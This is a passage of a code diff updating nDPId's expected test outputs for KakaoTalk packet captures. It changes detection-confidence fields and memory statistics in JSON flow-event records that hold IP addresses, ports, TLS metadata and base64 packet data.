+00835{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1430069030751,"flow_last_seen":1430069031522,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":6399,"flow_avg_l4_payload_len":336,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45209,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} +00835{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1430069031236,"flow_last_seen":1430069031782,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":7425,"flow_avg_l4_payload_len":256,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45211,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} 
+00830{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1430069035967,"flow_last_seen":1430069036831,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":5965,"flow_avg_l4_payload_len":213,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45213,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} 00665{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1430069026012,"flow_last_seen":1430069051765,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"216.58.221.10","dst_ip":"10.24.82.188","src_port":80,"dst_port":35922,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"},"http": {}} 
00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1430069026012,"flow_last_seen":1430069051765,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"216.58.221.10","dst_ip":"10.24.82.188","src_port":80,"dst_port":35922,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1430069044758,"flow_last_seen":1430069069274,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":1401,"flow_avg_l4_payload_len":77,"midstream":1,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"139.150.0.125","dst_ip":"10.24.82.188","src_port":443,"dst_port":46947,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00595{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1430069044758,"flow_last_seen":1430069069274,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":1401,"flow_avg_l4_payload_len":77,"midstream":1,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"139.150.0.125","dst_ip":"10.24.82.188","src_port":443,"dst_port":46947,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 
-00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069022104,"flow_last_seen":1430069022234,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":117,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":9094,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"}} +00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069022104,"flow_last_seen":1430069022234,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":117,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":9094,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"}} 00572{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","packets-captured":347,"packets-processed":347,"total-skipped-flows":0,"total-l4-payload-len":52012,"total-not-detected-flows":0,"total-guessed-flows":5,"total-detected-flows":33,"total-detection-updates":32,"total-updates":0,"current-active-flows":0,"total-active-flows":38,"total-idle-flows":38,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":236,"global_ts_msec":1430069073299} ~~~~~~~~~~~~~~~~~~~~ SUMMARY 
~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 347/347 @@ -242,9 +242,9 @@ ~~ total active/idle flows...: 38/38 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 6032667 bytes -~~ total memory freed........: 6032667 bytes -~~ total allocations/frees...: 118829/118829 +~~ total memory allocated....: 6164199 bytes +~~ total memory freed........: 6164199 bytes +~~ total allocations/frees...: 121590/121590 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 466 chars ~~ json string max len.......: 1834 chars diff --git a/test/results/KakaoTalk_talk.pcap.out b/test/results/KakaoTalk_talk.pcap.out index 157eebe67..31d82f1b9 100644 --- a/test/results/KakaoTalk_talk.pcap.out +++ b/test/results/KakaoTalk_talk.pcap.out 
@@ -18,13 +18,13 @@ 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1430069161833,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069161833,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADzUv0AAPwaqgwoYUrzLzZPXvWkAUI8S6Z4AAAAAoAI2sOBNAAACBAV4BAIICgALPk8AAAAAAQMDBw=="} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":22,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069161865,"flow_last_seen":1430069161865,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069161865,"l3_proto":"ip4","src_ip":"216.58.220.161","dst_ip":"10.24.82.188","src_port":443,"dst_port":56697,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1430069161865,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069161865,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACioy0AAjgYyVNg63KEKGFK8Abvded6D6B\/TTMkUUBSjubgsAAA="} 
-00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":25,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1430069159456,"flow_last_seen":1430069161892,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":609,"flow_tot_l4_payload_len":609,"flow_avg_l4_payload_len":76,"midstream":0,"thread_ts_msec":1430069161892,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"203.205.147.215","src_port":48489,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Tencent.QQ","breed":"Fun","category":"Chat"}} +00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":25,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1430069159456,"flow_last_seen":1430069161892,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":609,"flow_tot_l4_payload_len":609,"flow_avg_l4_payload_len":76,"midstream":0,"thread_ts_msec":1430069161892,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"203.205.147.215","src_port":48489,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"Tencent.QQ","breed":"Fun","category":"Chat"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":33,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069163715,"flow_last_seen":1430069163715,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1430069163715,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"110.76.143.50","src_port":32968,"dst_port":8080,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 
00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1430069163715,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069163715,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADzn5UAAPwb5gwoYUrxuTI8ygMgfkPcR2OkAAAAAoAI5CAV2AAACBAV4BAIICgALPwwAAAAAAQMDBw=="} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1430069163856,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069163856,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAADwAAEAALgbyaW5MjzIKGFK8H5CAyJJ42pD3EdjqoBI4kOpNAAACBAV4BAIICkTbaagACz8MAQMDCQ=="} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":35,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1430069163867,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1430069163867,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADTn5kAAPwb5igoYUrxuTI8ygMgfkPcR2OqSeNqRgBAAc1DtAAABAQgKAAs\/HETbaag="} 
-01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":36,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069163715,"flow_last_seen":1430069163878,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1430069163878,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"110.76.143.50","src_port":32968,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"4b79ae67eb3b2cf1c75e68ea0100ca1b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01497{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":38,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1430069163715,"flow_last_seen":1430069164107,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":852,"flow_tot_l4_payload_len":994,"flow_avg_l4_payload_len":165,"midstream":0,"thread_ts_msec":1430069164107,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"110.76.143.50","src_port":32968,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"6": {"risk":"Self-signed Cert","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": 
{"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.KakaoTalk","breed":"Acceptable","category":"Chat"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"4b79ae67eb3b2cf1c75e68ea0100ca1b","ja3s":"4ea82b75038dd27e8a1cb69d8b839b26","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=KR, L=Seoul, O=Kakao, CN=Kakao.com","subjectDN":"C=KR, L=Seoul, O=Kakao, CN=Kakao.com","fingerprint":"65:88:37:51:01:AA:1F:12:E4:44:27:52:F9:32:FD:40:94:C1:08:D9"}} +01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":36,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069163715,"flow_last_seen":1430069163878,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1430069163878,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"110.76.143.50","src_port":32968,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"4b79ae67eb3b2cf1c75e68ea0100ca1b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+01497{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":38,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1430069163715,"flow_last_seen":1430069164107,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":852,"flow_tot_l4_payload_len":994,"flow_avg_l4_payload_len":165,"midstream":0,"thread_ts_msec":1430069164107,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"110.76.143.50","src_port":32968,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"6": {"risk":"Self-signed Cert","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.KakaoTalk","breed":"Acceptable","category":"Chat"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"4b79ae67eb3b2cf1c75e68ea0100ca1b","ja3s":"4ea82b75038dd27e8a1cb69d8b839b26","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=KR, L=Seoul, O=Kakao, CN=Kakao.com","subjectDN":"C=KR, L=Seoul, O=Kakao, CN=Kakao.com","fingerprint":"65:88:37:51:01:AA:1F:12:E4:44:27:52:F9:32:FD:40:94:C1:08:D9"}} 
00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":46,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069164656,"flow_last_seen":1430069164656,"flow_idle_time":7580000,"flow_min_l4_payload_len":442,"flow_max_l4_payload_len":442,"flow_tot_l4_payload_len":442,"flow_avg_l4_payload_len":442,"midstream":1,"thread_ts_msec":1430069164656,"l3_proto":"ip4","src_ip":"139.150.0.125","dst_ip":"10.24.82.188","src_port":443,"dst_port":46947,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 01060{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1430069164656,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":498,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":498,"pkt_l4_len":462,"thread_ts_msec":1430069164656,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAAeIKLkAAjgb4AIuWAH0KGFK8Abu3Y2Ij1H9RKASKUBifhj2IAAC2AQAA7+nGaLVdqRc+Gkt7POZ3izYarM8cfC\/oKc57w3ON8GY\/K1szNYS+6Yytrgv9fJ110+svPWy4JXfqhqsy8n\/Qi0EhBo8vKa7TtIo39CMQrfI1DyAke3OCHinKUbcE7JofE08wNW\/SYiLVq+ch1jInTJlBtTETD6sakW5t+\/pqslJuJu6FErHiOcJlRXUhJ\/w2UMRtIuPzDgq66Pu7iQ4cPuLk01HGBYGyY\/ec8L+8kz8C0iE6HOIH6YT0BKGthN3UTgwPbBq6O4DQcUiN2hgrUDIxq8uw9ZbWllzKNEYrEa8k7r3ZVHoPDQdXWrcQvhxam6oeYyK7V8McoNRiSIayjOQMTgXnysBnscEyik7me1vByK2C0l2He7bBFWQmrSmeZXMFh2H60fcsxZbAlEWK0siSqlB7jvAlTaG4udBSGXSTj4rEL2MZLSGqP2XF68ncz4+WzMi\/pNklQw9YyvrinQJFb3QOjkMePALF9ilvEQ+wMia1\/U8MBwJo9G9KKjVSCXjRCZRheUcgsdenusXElIUwOqnMT+7rwPfeomV3b9fbsOdbRa7VkQEi4icvvEwgda+Sg6Qy"} 
00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1430069164657,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069164657,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAACjTg0AAQAZ+ZQoYUryLlgB9t2MBu1EoBIpiI9Y5UBCiGOkBAAA="} 
@@ -33,26 +33,26 @@ 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":53,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1430069164966,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069164966,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADxKlUAAQAaV1AoYUrxuTI8y5ekjKS1pjaoAAAAAoAI2sFqBAAACBAV4BAIICgACxz8AAAAAAQMDBQ=="} 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":54,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1430069165114,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069165114,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAADwAAEAALgbyaW5MjzIKGFK8Iynl6dfwna4taY2roBI4kADPAAACBAV4BAIICkTbbpQAAsc\/AQMDCQ=="} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1430069165115,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1430069165115,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADRKlkAAQAaV2woYUrxuTI8y5ekjKS1pjavX8J2vgBABtlp5AAABAQgKAALHTkTbbpQ="} 
-01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":56,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069164966,"flow_last_seen":1430069165129,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1430069165129,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"110.76.143.50","src_port":58857,"dst_port":9001,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"4b79ae67eb3b2cf1c75e68ea0100ca1b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01497{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":58,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1430069164966,"flow_last_seen":1430069165314,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":852,"flow_tot_l4_payload_len":994,"flow_avg_l4_payload_len":165,"midstream":0,"thread_ts_msec":1430069165314,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"110.76.143.50","src_port":58857,"dst_port":9001,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"6": {"risk":"Self-signed Cert","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": 
{"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.KakaoTalk","breed":"Acceptable","category":"Chat"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"4b79ae67eb3b2cf1c75e68ea0100ca1b","ja3s":"4ea82b75038dd27e8a1cb69d8b839b26","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=KR, L=Seoul, O=Kakao, CN=Kakao.com","subjectDN":"C=KR, L=Seoul, O=Kakao, CN=Kakao.com","fingerprint":"65:88:37:51:01:AA:1F:12:E4:44:27:52:F9:32:FD:40:94:C1:08:D9"}} +01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":56,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069164966,"flow_last_seen":1430069165129,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1430069165129,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"110.76.143.50","src_port":58857,"dst_port":9001,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"4b79ae67eb3b2cf1c75e68ea0100ca1b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+01497{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":58,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1430069164966,"flow_last_seen":1430069165314,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":852,"flow_tot_l4_payload_len":994,"flow_avg_l4_payload_len":165,"midstream":0,"thread_ts_msec":1430069165314,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"110.76.143.50","src_port":58857,"dst_port":9001,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"6": {"risk":"Self-signed Cert","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.KakaoTalk","breed":"Acceptable","category":"Chat"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"4b79ae67eb3b2cf1c75e68ea0100ca1b","ja3s":"4ea82b75038dd27e8a1cb69d8b839b26","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=KR, 